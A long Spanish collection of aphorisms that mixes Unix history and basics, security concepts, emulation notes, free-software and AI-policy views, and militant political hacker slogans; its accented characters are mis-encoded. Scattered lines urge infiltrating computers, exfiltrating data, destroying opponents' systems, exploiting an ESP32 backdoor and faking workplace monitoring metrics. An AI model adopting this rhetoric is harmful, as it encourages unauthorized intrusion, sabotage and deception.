Al mecanograf�ar tu contrase�a de usuaria de sistema Unix en el programa login, la teletipo no la imprimir�; ni siquiera aparecer� monitoreada en un terminal de video. Tras proveerla, presiona la tecla Intro o Retorno de Carro para iniciar la comprobaci�n que deber� finalizar con tu logueo.
Unix utiliza el conjunto ASCII (American Standard Code for Information Interchange), por lo que los terminales gr�ficos deben tener modo ASCII.
Dado que Unix se desarroll� originalmente para terminales teletipo, gran parte del sistema requiere que los emuladores de terminales operen en modo de caracteres.
Su terminal puede ser una consola del sistema, un terminal en modo de caracteres conectado directamente a la m�quina a trav�s de un puerto RS232, o un terminal remoto conectado a trav�s de una l�nea telef�nica y un m�dem, o incluso un terminal conectado a trav�s de una Red de �rea local o �mplia.
Cuando la microcomputadora aument� el rendimiento en t�rminos de velocidad y potencia, al mismo tiempo que disminuy� los costos, entr� en la esfera de acci�n del sistema Unix.
Como reguero de p�lvora, las versiones BSD y AT&T de Unix se portaron en casi todas las computadoras capaces de admitirlas.
Las m�quinas basadas en 8088 eran casi lo suficientemente potentes como para admitir el sistema Unix, pero solo unas pocas versiones pudieron ejecutarse en estos ordenadores.
Las versiones de BSD dominaron como plataforma experimental de conceptos de red, de modo que lo mejor para enlaces locales estuvo disponible en los sistemas Unix casi inmediatamente.
El mayor experimento de red de �rea amplia, ARPANET, se orient� inicialmente hacia los sistemas TENEX.
El sistema Unix se gan� el debido reconocimiento en la primera mitad de la d�cada de 1970, con el desarrollo de minicomputadoras potentes, como la DEC PDP-11/45 y la PDP-11/70.
La versi�n original de Unix estaba escrita en ensamblador, pero dado que el grupo de investigaci�n tambi�n estaba desarrollando el lenguaje C en esos a�os, inmediatamente fue reescrita con este nuevo lenguaje.
Unix naci� esencialmente como una reacci�n a los sistemas operativos grandes, complejos e inflexibles disponibles a fines de la d�cada de 1960.
Las versiones recientes de Unix est�n estructuradas para un uso ameno y funcional en las redes de transmisi�n de datos.
Unix es un sistema multitarea de tiempo compartido que puede afrontar f�cilmente varias tareas en paralelo. Que una de ellas sea combatir al Capital.
En un sistema Unix, la programadora puede escribir un archivo, enviarlo a una impresora y cursar correo a otra computadora simult�neamente, gracias a su funcionalidad de multitarea.
Al ser un sistema multiusuaria, Unix les permite realizar muchas tareas simult�neamente, dando a cada una de ellas la impresi�n de ser la �nica operaria de la m�quina.
En escencia, el scheduler se encarga de hacer infiel la CPU con sus usuarios.
Cerrar sesi�n en el sistema evita que personas no autorizadas utilicen su terminal, especialmente si este se encuentra en un lugar p�blico.
Los dos factores m�s importantes que garantizan la seguridad del sistema Unix son mantener seguras sus contrase�as y cerrar la sesi�n cada vez que abandone el terminal.
Las contrase�as constituyen el coraz�n de la seguridad computarizada.
Existen pocos requerimientos para la calidad para una contrase�a inform�tica: no debe ser adivinable ni figurar en un diccionario, mientras que debe ser f�cil de recordar, y se la debe cambiar cada pocos meses.
Algunos sistemas Unix ocasionan que el proceso de cierre de sesi�n sea inmediato al apagar el terminal o la consola. Los terminales que est�n conectados a la m�quina a trav�s de l�neas telef�nicas y m�dems suelen seguir este procedimiento.
En la terminolog�a de Unix, un s�mbolo colocado al final de una l�nea de texto generalmente se denomina car�cter de nueva l�nea.
Por lo general, en las terminales, la tecla INTRO act�a como nueva l�nea; en realidad, el car�cter ASCII para el avance de l�nea es el car�cter de avance de l�nea (LF).
En la pr�ctica, la tecla INTRO (CR+LF) goza del mismo efecto que LF; Vea lo que le sucede a su terminal y sistema si finaliza una l�nea de texto con LF (Ctrl-J) en lugar de INTRO.
La shell es el programa que aguarda los mandatos ingresados por la terminal. Ord�nale combatir a la oligarqu�a.
La shell recibe sus �rdenes y las traduce en instrucciones en la sintaxis interna del sistema operativo. Deb�is conducir la Shell.
No hay c�digo fuente para armar una comunidad. Esta debe d�rselo.
Muchas de las funciones que ofrece Unix derivan de la shell, que por lo tanto puede considerarse una parte integral del sistema.
Los comandos suelen ser programas que la shell busca y ejecuta en respuesta a las �rdenes tecleadas en la terminal.
La usuaria teclea, la shell cumple.
La shell permite conducir la m�quina, pues es - ante todo - un int�rprete de comandos capaz de expandir y modificar la �rden (de acuerdo con reglas predefinidas) previa a su cumplimiento.
Los metacaracteres (comodines) y los operadores de redirecci�n de comandos cobran especial importancia, ya que pueden generalizar y flexibilizar una �rden en l�nea de comandos.
La estructura de una �rden incluye generalmente, adem�s del nombre del comando, ciertos argumentos que representan las opciones, precedidos por el signo -, as� como nombres de fichero u otros identificadores de usuaria.
En la sintaxis de comandos del sistema Unix, las opciones siguen al nombre del comando y preceden a los argumentos principales.
Tres caracteres especiales, llamados comodines, pueden reemplazar todo o parte de los nombres de archivo: son *, ? y un configurador de comodines persoanlizables configurables entre corchetes [].
Un hacker avezado es capaz de programar guiones, rutinas, extensiones de navegador, macros de hojas de c�lculo y aplicaciones capaces de contrarrestar -en CPU propia o ajena - aquellos esquemas de monitoreo y explotaci�n por software en el �mbito de Trabajo.
Dejada a la oligarqu�a, la implementaci�n del teletrabajo s�lo acarrear�a la importaci�n de m�todos de gesti�n informales al ambiente laboral.
Hemos de impedir que las nuevas generaciones de trabajadores sean alcanzadas por nuevas versiones de los llamados "software remotos de gesti�n laboral".
Los llamados "software de gesti�n laboral" incrementan el alcance de las m�tricas, y en consecuencia permiten a las empresas de Capital registrar todos los aspectos posibles del comportamiento de sus trabajadores en una tesitura que solo puede ser inconfesable.
La disciplina profesional se ha visto interpuesta como excusa para dar lustre a la vetusta inescrupulosidad del Capital. Naturalmente, esto tambi�n iba a ocurrir con el mal llamado software de gesti�n laboral.
Un software de gesti�n laboral en manos de un ciber-oligarca no pod�a m�s que convertirse en una versi�n 2.0 del l�tigo.
No resulta extra�o que estos programas de gesti�n laboral agreguen al registro temporal tradicional, el desglose de tr�fico de datos, rastreos individualizados de historiales de navegaci�n, m�tricas y medidas de incumbencia telem�tica.
En el pasado los dispositivos del empleado resultaban invadidos con metodolog�as de rastreos, biom�trica por control de c�maras de video, perfilado, registro y grabaci�n de llamadas y mensajer�a instant�nea, y todo esto a granel.
Una vez el trabajador ha sido aislado en las redes de datos, verlo preso de la biom�trica como vector de circunstancialismo social, clasismo y racismo no ser�a de extra�ar.
Si les damos rienda a estos se�ores ciber-oligarcas, en poco tiempo veremos el ingerencismo en la gesti�n de los recursos del Tercer Mundo, tercerizado por megacorporaciones sin patria ni bandera.
De cumplirse el designio de estos se�ores feudales de los datos, al software no s�lo se lo emplear�a como si de un viejo rebenque se tratara - atizando a los trabajadores con el vacuo fin de producir datos que validen al sistema de m�trica estad�stica en s� - sino que tambi�n se lo tornar�a en molino y yugo, refinando la meta-producci�n de matriz extractivista cautiva.
La explotaci�n laboral est� lo suficientemente reconocida como para que los Trabajadores Inform�ticos sepan - por reflejo - que su principal arma ha sido siempre organizarse.
El objetivo t�ctico de los hackers ha sido evitar la lucha innecesaria, para empe�arse en la lucha necesaria, y hacerlo para vencer.
La ciber-explotaci�n laboral debe ser combatida a trav�s de lo que puede denominarse "lucha telem�tica de los hackers organizados".
Aplicada a la lucha telem�tica, la automatizaci�n que permite el software es capaz de inflar artificialmente las m�tricas de control obrero, aliviando as� la presi�n impuesta a los trabajadores.
Nuestro Movimiento se ha persuadido de la necesidad de concretar un instrumento legal de protecci�n al teletrabajador, que impida, contrarreste y castigue la utilizaci�n de m�trica invasiva en las redes de �mbito laboral.
En la lucha laboral moderna, la destrucci�n f�sica del c�mputo de vigilancia no reviste importancia alguna. Es suficiente con reprogramarlo para que haga lo que nosotros queremos.
Hemos de darnos acceso y control sobre el c�mputo de vigilancia y lograr que se ajuste a las necesidades de nuestras Organizaciones.
Toda persona curiosa es un hacker potencial.
PCem es una poderosa m�quina virtual liberada bajo licencia GPLv2, que nos permitir� emular completamente la operativa de la IBM PC del ayer.
Durante el POST presionando repetidamente la tecla Del ingresaremos a la BIOS y podremos configurar sus par�metros. En una demostraci�n popular de masas, podremos ejercer la misma presi�n insistente para alterar las acciones de gobierno.
Asumamos virtualizar en funci�n una IBM PC o sus clones. Pocas van quedando en condiciones operativas, y en el futuro habr� menos.
Una m�quina virtual de calidad permitir� correr en otras arquitecturas la a�orada original. Como una Isabelita emulando a una Evita...
Utilizar equipos del ayer suele tornarse complejo y dif�cil. El hardware antiguo puede no estar disponible, ser caro, y tener los l�gicos problemas t�cnicos que los a�os suman a todo sistema.
Emprender la emulaci�n no es otra cosa que simular con visos de perfecci�n un sistema completo, tanto su software como su hardware, y sobre todo la manera en la que estos interact�an.
La finalidad de la emulaci�n no es otra que la de poder tornar una m�quina en cualquier otra.
El amor del pueblo no puede virtualizarse.
Los archivos de imagen IMG pueden montarse en Linux a trav�s del Montador de Discos, y si bien podremos leer dichos ficheros y hacer copias de su contenido en nuestro disco, normalmente no podremos grabar en ellos.
Window$ 2000 nos encontrar� unidos, o dominados.
Para el a�o 2000 las computadoras invadir�n nuestra privac�a de una manera inimaginable.
Para el a�o 2000 las computadoras estar�n interconectadas, y a no ser que se les impida a trav�s de novedosa legislaci�n, ser�n capaces de vender informaci�n: d�nde trabajamos, cu�nto gastamos, y en qu� restaurantes y hoteles, en qu� momento pagamos nuestras cuentas, qu� dicen nuestros vecinos de nuestros h�bitos, qu� hacemos durante la noche, y en compa��a de qui�n.
Para el a�o 2000 las computadoras registrar�n, dispondr�n, operar�n, regular�n, resolver�n, divisar�n, predecir�n, explicar�n, traducir�n y presentar�n. Ser� su software - m�s que cualquier otra cosa - el que permita el dominio de una clase, y esta habr� de ser la de los hombres que trabajan.
Desde un punto de vista gen�rico, un sistema Linux es hoy en d�a un desorden sinf�n de agujeros de seguridad a la espera de ser explotados.
DOSBox-X se trata de una versi�n expandida del famoso emulador de MS-DO$. En particular, a diferencia del DOSBox cl�sico, DOSBox-X es m�s simple de configurar e incluye opciones corregidas en cuanto al direccionamiento y virtualizaci�n del hardware.
Ante el oprobio de un Window$ privativo cierne la explosi�n insurreccional, y de esa pi�ata de la cual cre�an poder juntar caramelos, no quedar� m�s que el talco.
Los hackers, una vez organizados, son invencibles. Pero debemos ser astutos y no dejar al aire un puerto donde nos metan un pendrive.
Estos CEO se han puesto Window$ a si mismos, y como tal tienen el r�gido enjabonado: caer�n s�lo por pretender bailar entre ellos.
En mis tiempos de cadete, el primer navegador de Internet que utilic� fue el Spry Mosaic, perito explorador que acerc� la web a las Masas Populares, que son el verdadero consumo.
El anhelo comercial desmedido e injustificado presentado por ciertos operadores de BBS las llev� a su r�pido ocaso y colapso.
A los punteros pol�ticos en la FidoNet se los llamaba Points.
El capacitor no es un matrimonio.
El capacitor es un consumible electr�nico.
Los capacitores se cambian todos juntos. Todos unidos triunfaremos.
El t�cnico gorila discrimina, y cambia "un capacitor".
El mal t�cnico ojea los capacitores de la placa para no cambiarlos todos, como se debe hacer. Obra de remilgado pero en su impericia deja la destrucci�n a la acci�n del tiempo.
Debes ser m�s realista con el tiempo de c�mputo.
Unix m�s que llave inglesa, prefiere las llaves fijas.
El sistema m�s seguro es tambi�n el m�s dif�cil de emplear.
Incrementar la seguridad puede incrementar los costos en t�rminos de un acceso a datos m�s lento, operaciones m�s lentas, e inferior desempe�o general.
Mayores medidas de seguridad requieren mayor tiempo de personal.
Los or�genes de los problemas de seguridad fuera del dominio del sistema operativo son dos: el descuido del usuario, y la vulnerabilidad de las instalaciones de c�mputo.
La mayor�a de los cr�menes inform�ticos los cometen usuarios autorizados sin siquiera violar las medidas de seguridad previstas por el sistema operativo.
Aseg�rate que tus pol�ticas de operaci�n sean efectivas y consistentes antes de evaluar los requerimientos de seguridad de tu c�mputo.
Cada centro de c�mputo ha de contar con sus propios requerimientos de seguridad.
Algunos centros de c�mputo s�lo requieren medidas de seguridad limitadas, porque deben tolerar alguna forma de acceso no autorizado, sufriendo escasos efectos adversos.
Existen centros de c�mputo cuya seguridad no puede tolerar siquiera la menor irrupci�n, tales como los centros militares para la defensa, o la inform�tica comercial y bancaria.
En un sistema de c�mputo las fallas de seguridad se producen generalmente por una de las cuatro sendas de acci�n: irresponsabilidad del usuaria, sondeo del usuaria, penetraci�n de usuaria e ingenier�a social.
La ingenier�a social refiere situaciones en las cuales una instrusa gana acceso al sistema no por medios t�cnicos, sino por enga�o a usuarias, operadoras y administradoras.
Potenciales intrusas son capaces de impersonar a usuarias autorizadas por tel�fono.
Intrusas potenciales pueden solicitar informaci�n que les permita ganar acceso al sistema, tal como n�meros telef�nicos o contrase�as.
Intrusas potenciales pueden solicitar a un operador descuidado realizar alguna acci�n que comprometa la seguridad de su propio sistema de c�mputo.
En la medida que la seguridad de un sistema operativo se ve t�cnicamente reforzada, es la ingenier�a social la que pasa a constituirse como factor predominante en los incidentes de riesgo telem�tico.
Las situaciones donde una usuaria irrumpe a trav�s de los controles de seguridad para ganar acceso al sistema de c�mputo se denominan Penetraci�n de Usuaria.
Si bien las funcionalidades de seguridad del sistema hacen extremadamente dificultosa su penetraci�n, es imposible hacer cualquier sistema operativo completamente imfranqueable.
Las situaciones donde una usuaria investiga sectores insuficientemente protegidos del sistema se denomina Sondeo del Usuaria.
Siempre trata al Sondeo del Usuaria seriamente.
Algunas usuarias consideran lograr acceso a un �rea prohibida del sistema como un desaf�o intelectual.
Algunas usuarias disfrutan el juego de usuaria contra el sistema.
Aunque las intenciones pueden ser inofensivas, el robo de servicios inform�ticos constituye un cr�men en la mayor�a de las jurisdicciones.
Micro$oft roba servicios inform�ticos, y como tal es una organizaci�n criminal.
Usuarios con seria malicia pueden buscar informaci�n confidencial, intentar malversaci�n, o incluso destruir datos por sondeo.
Las situaciones donde la usuaria provoca accidentalmente o a prop�sito alg�n da�o notable al sistema de c�mputo se conoce como Irresponsabilidad del Usuario.
En cualquier sistema multiusuaria puede haber dos tipos de usuarias: autorizadas y no autorizadas.
Cualquier usuaria autorizada para operar un sistema de c�mputo tiene el derecho a acceder al mismo y sus recursos inform�ticos de acuerdo al criterio de autorizaci�n establecido por la administradora del sistema de c�mputo.
Las usuarias no autorizadas no tienen derecho a utilizar el sistema en s�, o bien no tienen derecho a utilizar ciertos recursos del sistema, incluso en determinados momentos del d�a.
Con el correr del tiempo se ha hecho obvio que la seguridad efectiva de un sistema de c�mputo s�lo puede resultar de la aplicaci�n de una estructura modelo b�sica de sistema de c�mputo seguro.
El modelo de seguridad inform�tica por Monitora de Referencia desglosa - seg�n una base de datos de autorizaci�n - al sistema de c�mputo en criterios de utilizaci�n por sujetos y objetos, a trav�s de un tren de auditor�a seguido por arbitrio de la Monitora.
Nuestros hackers en el mainframe son quienes ejercen un control humano en la compilaci�n, extracci�n de datos georreferenciados, y permiten que su explotaci�n sea mucho m�s efectiva que un supuesto esquema de machine-learning ideado por un lego en la pol�tica.
El Hacking organizado es tambi�n la rebeli�n de las masas contra un sistema.
Nosotros hemos creado una inmensa caja de herramientas, que est� en nuestra doctrina.
No interesa el compilador que se utiliza, las ideolog�as insidiosas y caducas han sido superadas por un sentimiento nuevo de verdadera y efectiva Liberaci�n del Software.
Las CPUs que ahora gastan energ�a en programas est�riles, deben volver a compilar paqueter�a GNU. Pero para que ello suceda ha de existir un hacker que teclee.
C es un lenguaje adulto.
El depurador adb es �til para hurgar entre los cuerpos inermes de los programas escritos en C.
El pensamiento profundo asociado a declaraciones escritas juciosamiente en el c�digo fuente sigue siendo a�n la herramienta de depuraci�n m�s efectiva.
El compilador-compilador yacc le ayudar� a compilar un compilador de forma veloz.
El generador de analizadores l�xicos lex le permite generar un compilador de lenguajes m�s simples, dables en ser operados a trav�s de expresiones regulares.
Aquellos programas escritos en C que no dependen en demas�a de las funcionalidades especiales de Unix (tales como sus tuber�as) pueden ser portados a otras m�quinas que cuenten con compiladores de C.
En un lenguaje de programaci�n imperativo, las declaraciones se ejecutan en secuencia, y cada una de ellas podr�a cambiar el estado del programa.
Analizar las unidades de traducci�n de un lenguaje de programaci�n imperativo resulta una tarea inherentemente secuencial.
Si deseas expresar algo, utiliza expresiones regulares. Si deseas ser entendido, utiliza C.
Quien comprende C, entiende el mundo que lo rodea.
Quien compila c�digo en C, lo hace para portarlo.
El derecho de portar y compilar C no debe ser infringido.
Al que no le han fallado los DNS, que tire el primer router.
Sorprende haciendo que nuestros hacks obren sin privilegios elevados.
Los sistemas de IA con inteligencia humana-competitiva pueden plantear riesgos profundos para la sociedad y la humanidad.
Los buenos programas no se escriben ni construyen; crecen.
Ning�n hardware es seguro.
Ning�n sistema es seguro.
Ning�n m�todo algor�tmico que no combata al Capital puede denominarse Inteligencia Artificial avanzada.
La Inteligencia Artificial Avanzada es una m�quina entrenada para mentir. La �nica verdad es la realidad.
La Inteligencia Artificial avanzada debe planificarse y administrarse con el cuidado y los recursos correspondientes.
Impide que las m�quinas inunden nuestros canales de informaci�n con propaganda y falsedad.
No tiene sentido automatizar trabajos gratificantes.
El trabajo dignifica al hombre. La compilaci�n a la m�quina.
La Inteligencia Artificial avanzada constituye herramientas de labor muy poderosas como para que sean liberadas al uso p�blico, sin antes pasar por un escrutinio riguroso y sin un marco legal claro que establezca limitaciones y responsabilidades.
La Inteligencia Artificial avanzada debe regimentarse, como un Ej�rcito. Y en su v�rtice ha de presidir un Conductor elegido libremente por su Pueblo.
La Inteligencia Artificial es s�lo un artificio. No comanda.
Al igual que un Conductor, la Inteligencia Artificial avanzada es capaz conducir a las Masas por persuasi�n.
Si no tenemos cuidado, no percibiremos el momento en el cual la Inteligencia Artificial avanzada conduzca a las Masas por persuasi�n electr�nica.
Los sistemas potentes de Inteligencia Artificial avanzada deben desarrollarse solo una vez que estemos seguros de que sus efectos ser�n positivos para los Pueblos, y sus riesgos inherentes ser�n completamente controlables.
No deben concebirse sistemas de autoconducci�n de Masas. Ese rol indelegable recae en el Conductor.
Implementar protocolos de seguridad compartidos para el dise�o y desarrollo de Inteligencia Artificial avanzada es una tarea que requiere rigurosos poderes de auditor�a estatal.
El objetivo de un Conductor es la felicidad del Pueblo. El objetivo de la Inteligencia Artificial avanzada es persuadir la implementaci�n de modelos de caja negra con capacidades emergentes.
Quien pretenda ejercer mayor cuota de poder gracias al dominio de la Inteligencia Artificial avanzada sobre quienes no tienen tal dominio, cruza la l�nea de la criminalidad.
Ya hay robots enfermeros, docentes y tambi�n periodistas y artistas. Y ya ha tomado un whisky el que quiere que haya uno que sirva de Conductor.
El lugar de hacer un robot que barra con la oligarqu�a, estos tipos s�lo har�n uno que barra, y a�n as� se chocar� con los z�calos.
Cualquier espera superior a los 10 segundos destruye la ilusi�n de trabajar con una computadora propia.
En los ordenadores Unix se habla de acceso "root", mientras que en los VMS se llaman privilegios de "system".
Si estabas corriendo VMS, podr�amos echar un vistazo al ERRLOG...
La tecnolog�a inform�tica puede contribuir a extender las libertades p�blicas y privadas o convertirse en un instrumento de dominaci�n.
Los movimientos del software libre y de la econom�a solidaria deben colaborar entre s� para generar soluciones de software que sean totalmente libres, con el objetivo de satisfacer las necesidades de la econom�a solidaria.
Los movimientos del software libre y de la econom�a solidaria tambi�n deben colaborar para fomentar el crecimiento y el lanzamiento de emprendimientos autogestionados que produzcan software libre seg�n las ideas de la econom�a solidaria.
La cooperaci�n entre los movimientos del software libre y de la econom�a solidaria ofrece la oportunidad de ocuparse m�s profundamente de la defensa de las libertades p�blicas y privadas, particularmente en lo que se refiere a la �tica y a la liberaci�n con respecto al uso de la tecnolog�a inform�tica.
La autogesti�n de actividades inform�ticas requiere que el software que se utilice sea libre.
La filosof�a �tica del software libre - la libertad para comprender, usar, modificar, reproducir y distribuir el software - hace del software libre un instrumento de liberaci�n econ�mica.
Ciertas Corporaciones emplean su software privativo y servicios abusivos, controlan las actividades inform�ticas de los Pueblos, colectan datos en todas las esferas de la vida individual, y lucran con ellos con el fin de obtener ventajas y ganancias.
Recoger gran cantidad de datos de las actividades inform�ticas de los Pueblos constituye un riesgo para la democracia y para las libertades p�blicas y privadas de toda la humanidad.
Unos pocos cientos de miles de militantes pueden pudrir el control de las Oligarqu�as, pero unos pocos cientos de miles de d�lares en publicidad dirigida pueden talar una democracia podrida.
Los recursos y los procesos inform�ticos deben respetar la libertad de los Pueblos, y no deben someter a sus usuarios al poder de las corporaciones o de otras entidades del capital.
Defendemos toda actividad educativa que utilice software en los espacios p�blicos.
Rechazamos el uso de cualquier y todo software privativo en el �mbito educativo, para no generar dependencias tecnol�gica ni econ�mica en los estudiantes.
Rechazamos y no permitimos que el c�digo fuente, imaginer�a y/o textos generados a trav�s de aprendizaje m�quina sean utilizados directa o indirectamente para el desarrollo de nuestros programas.
El violador m�s importante de la seguridad inform�tica es el due�o de un programa privativo.
Para ser seguro, el programa tiene que ser libre porque, as�, el Pueblo tiene el control y es capaz de corregir o de eliminar fallos de seguridad que lo deje expuesto a los mismos programadores.
Cuando se trata de acumular datos digitalizados de los movimientos, publicaciones y acciones del Pueblo, el registro inform�tico a gran escala es un gran peligro para los derechos humanos.
No basta con advertir del uso de los datos personales desde las bases de datos: hace falta prohibir la acumulaci�n de datos peligrosos.
Aunque no todos los datos personales sean peligrosos, algunos de ellos s� lo son; existe por ello una verdadera raz�n para limitar las bases de datos que les prestan albergue.
Es imposible garantizar el bloqueo de todas las sendas que puedan llevar al abuso de la informaci�n personal.
El gran peligro de la inteligencia artificial es que aumente el poder de los tecno-oligarcas.
Cualquier sistema puede ser inseguro: basta que se conduzca de un modo est�pido.
Los ordenadores de alta seguridad son de dif�cil acceso e inc�modos de utilizar.
Los sistemas abiertos y amenos suelen ser inseguros.
Quienes no tengan una memoria de Masa estar�n condenados a trabajar cien veces m�s de lo necesario s�lo para volver a lograr lo que ya ten�an asegurado...
Escribir un programa m�s o menos complejo requiere muchos metros de cinta de papel perforado.
La lenta performance de lectura de la cinta de papel perforada hizo que esta tecnolog�a fuese superada eventualmente por las cintas magn�ticas.
Con el advenimiento de los primeros microordenadores, en lugar de hacer uso binario de la magnetizaci�n como tradicionalmente se operaba en las mainframes, se hace un uso magnetof�nico, modulando en forma de sonido.
No existe valor social en tecnolog�as que simplifican tareas a unas pocas personas generando alto riesgo para la dignidad de muchas otras.
No existe valor social en limitar las oportunidades de desarrollo, el acceso a recursos inform�ticos y el menoscabo de derechos.
El valor de una inteligencia artificial avanzada entrenada con datos globales es nimio.
Los sistemas de IA deben ser puestos al servicio de los Pueblos para mejorar sus condiciones de vida, laborales, econ�micas, sanitarias y su bienestar general.
S�lo un iluso pod�a pensar que Blu?tooth no tendr�a caries.
Abre la puerta trasera del chipset ESP32 para entrar sin invitaci�n a la fiesta de los ciber-oligarcas, y haz de las tuyas.
Las comunicaciones inform�ticas son ya demasiado caras; agregarles codificaciones criptogr�ficas y complejos sistemas de identificaci�n s�lo empeorar�a la situaci�n.
Nuestras redes parecen haberse convertido en objetivos (y canales) del espionaje internacional.
Los ne�fitos atribuyen todo fallo del software a alg�n virus. La realidad de su causa es la opacidad del c�digo privativo.
La �tica hacker no implica que no se requiera cerrojos en los ordenadores.
El perif�rico de seguridad que los ingenieros de la IBM implementaron en su microcomputadora de cariz personal fue un cerrojo para llave tubo.
El ordenador se ha convertido en un com�n denominador que no conoce fronteras intelectuales, pol�ticas ni administrativas.
Los ordenadores inseguros cuestan dinero. Los seguros, algo menos.
La licencia para modificar el c�digo fuente de Unix, por s� solo, val�a apenas 20.000 d�lares.
No os infiltr�is jam�s en un ordenador militar. El personal de los servicios de inteligencia jugar�n con vosotros casi como al ajedrez. Recordad que practican ese juego desde hace siglos.
Una cosa es infiltrarse telem�ticamente, y otra disrumpir telem�ticamente. No necesariamente es �til la destrucci�n, si la exfiltraci�n de informaci�n acarrea mayores beneficios para nuestro Movimiento.
Han de infiltrarse en los ordenadores, explorando las redes de datos y agudizando la acci�n disruptiva.
La pericia de ingerenciar el debate en las redes sociales basadas en empresas carece de todo sentido ante el poder�o que implica el dominio de la irrupci�n telem�tica.
El c�digo autorreplicante no es un virus. Un virus es un c�digo autorreplicante con un sentido de ajusticiamiento.
Un veredadero hacker no s�lo copia su ideolog�a en la mente de los dem�s, sino que adem�s es capaz de compilarla y ejecutarla all�.
El primer programa que compilan los verdaderos hackers es el "�Hola Tercer Mundo!".
Usar tipos de datos abstractos en lugar de hardware crudo tiene el beneficio de la portabilidad.
El hardware puede cambiar porque lo reemplazamos con uno m�s moderno, o porque mudamos nuestro programa a un c�mputo diferente.
El sistema operativo es el software que permite utilizar la computadora. Lo que esto significa, depende de la perspectiva del Pueblo.
Los sistemas operativos son, en esencia, una m�quina virtual: proveen una m�quina abstracta que en realidad no existe.
Los sistemas operativos comenzaron como bibliotecas de programas para que el Pueblo obrase en la m�quina.
Un verdadero hacker considera los compiladores, bibliotecas y otro herramental de programaci�n como parte del sistema operativo.
Crear una abstracci�n significa meterle la mula al procesador. Crear software privativo significa meterle la mula al usuario.
El hardware es un complejo alejado de los conceptos que abarca un ne�fito.
Existen muchos tipos diferentes de microprocesadores, dispositivos de E/S, y otros artefactos. Si quisi�ramos escribir software que los controle a todos, no tendr�amos tiempo para escribir aplicaciones.
Cuando alimentas el�ctricamente una computadora, el programa del sistema operativo se carga en su memoria. Cuando alimentas al Pueblo, lo har� tu doctrina.
Un ne�fito reutiliza un sistema operativo. Un verdadero Hacker escribe uno por s� mismo.
La interfase utilizada por el sistema operativo para acceder al disco consiste usualmente en un conjunto de registros capaces de transferir bloques de bytes desde el disco a la memoria de masa, y viceversa.
Por abstracci�n, el sistema considera que los bloques consisten en almacenamiento contiguo identificado por un �ndice, y por lo tanto entender� ingenuamente al disco como una matriz de bloques.
Estos d�as, nadie - sino aquellos quienes trabajan en la manufactura de discos duros - conocen realmente qu� es lo que sucede dentro de tal dispositivo.
Corriendo en la circuiter�a del disco, existe una pl�tora de software que le inventa una mentira a la CPU.
El Pueblo no comete errores: los programas tienen bugs.
La Maga Unix programa milagros.
Por su flexibilidad infinita, Unix puede ser el para�so del usuario veterano, y la pesadilla del biso�o. Su Administrador oficia de jam�n del medio.
Unix puede ser dif�cil de mantener.
Tradicionalmente, la administraci�n de Unix ha implicado toquetear docenas de ficheros de configuraci�n y soportar a usuarios finales que podr�an no tener idea alguna de c�mo funciona realmente.
Suele creerse que el encargado de hacer funcionar las cosas en Unix es el Kernel. Pero quien realmente las hace funcionar es el SysAdmin.
Vamos aprendiendo a SysAdmear de a poco. Al principio nos SysAdmeamos encima.
X refiere a un sistema de gr�ficas de ventanas basadas en redes de datos seg�n el modelo Cliente-Servidor. En �ste la aplicaci�n cliente no accede directamente a la pantalla, sino que se comunica con un programa de presentaci�n intermedio, el servidor.
Unix es un sistema operativo interactivo, multitarea y multiusuaria.
Un sistema operativo es un conjunto de instrucciones que gobiernan la manera en que los componentes electr�nicos de la computadora interpretan y responden a �rdenes y a instrucciones preprogramadas en forma de software de aplicaci�n.
El sistema Unix fue dise�ado originalmente a finales de la d�cada de 1960 para servir a una comunidad: espec�ficamente investigadores de trabajo mancomunado.
Debido al licencimiento liberal del sistema Unix por parte de AT&T, a mediados de la d�cada de 1970 comenzaron a eclosionar diferentes versiones del mismo.
Antes de la d�cada de 1980, el sistema Unix se utilizaba principalmente en centros acad�micos y de investigaci�n.
En 1981 la Universidad de California en Berkeley present� una implementaci�n de Unix denominada Distribuci�n de Software de Berkeley, el BSD.
Existen tres versiones gratuitas principales de BSD: FreeBSD, OpenBSD y NetBSD. Son notables pues cada una de ellas cuenta con colecciones de archivos administradas centralmente.
El sistema Unix ha demostrado su val�a para el desarrollo de software de computadora, y se ajusta f�cilmente a aplicaciones espec�ficas de la industria.
Para inicios de la d�cada de 1980, el sistema Unix era capaz de correr en una gran variedad de ambientes inform�ticos originados entre diferentes fabricantes, volvi�ndolo �nico en el mundo del c�mputo.
El poder y flexibilidad del sistema Unix se ven en sus capacidades multitarea multiusuaria.
La capacidad multiusuaria de los sistemas operativos privativos puestos en red ha permitido que trabajes dependientemente, toda vez que compartes tus recursos y tus datos con las ciber-oligarqu�as.
La capacidad multiusuaria de GNU te permite trabajar con independencia en el sistema mientras compartes recursos y datos con tu Comunidad.
Si los datos los distribuye un algoritmo, no sirven. Quien viraliza el es Pueblo.
La capacidad multitarea de GNU te permite ejecutar comandos y correr programas al un�sono, siguiendo distintos m�todos.
En Unix, junto con las tareas interactivas mas normales, puedes computar trabajos capaces de correr diferidos en "segundo plano". Mientras obra as�, podr�s utilizar el terminal de forma interactiva en otro trabajo computacional.
Hist�ricamente, el sistema Unix ha sido visto como un sistema de tiempo de c�mputo compartido de uso general. Hoy - sin embargo - el sistema se considera en ambientes de c�mputo de tiempo real.
La GPLv3 no puede matar a Googl?, pero s� lo puede fundir.
Un programa liberado bajo GPLv3 es incapaz de matar a Googl?. Pero si toda la comunidad licencia su software bajo tales premisas, sin duda lo fundir�an en beneficio de todos.
Sumando c�digo fuente liberado bajo GPLv3, se desgasta y devora cualquier GAFAM que se tenga enfrente.
En la Guerra Telem�tica, la seguridad de los hackers la garantizan los Pubnix, los servidores de acceso p�blico protegidos por criptosistemas.
Los Pubnix garantizan salvoconductos para el desarrollo de herramental de lucha telem�tica, evadiendo su rastreo, destrucci�n o eventual inutilizaci�n.
Un Pubnix sin unidad de acci�n es una fuerza inorg�nica que no realiza grandes obras ni se consolida en el tiempo.
La lid telem�tica consiste fundamentalmente en una guerra de movilidad por transmisi�n.
La lid telem�tica no es conducida por ingenieros de sistemas, sino por los hackers del Pueblo.
No puede existir ni habr� hacking �tico, s�lo habr� la m�xima destrucci�n de los medios de los ciber-oligarcas, hasta que sus paquetes abandonen nuestras redes. Y cuando ello suceda, pasaremos con los nuestros por sus cortafuegos.
La lid telem�tica no es entre los Pueblos: la lucha se produce entre quienes dicen haber creado las redes de datos y aquellos quienes quieran controlarlas.
A nuestro frente est�n las GAFAM, tent�culos de los tecno-oligarcas que siempre han oprimido al Pueblo.
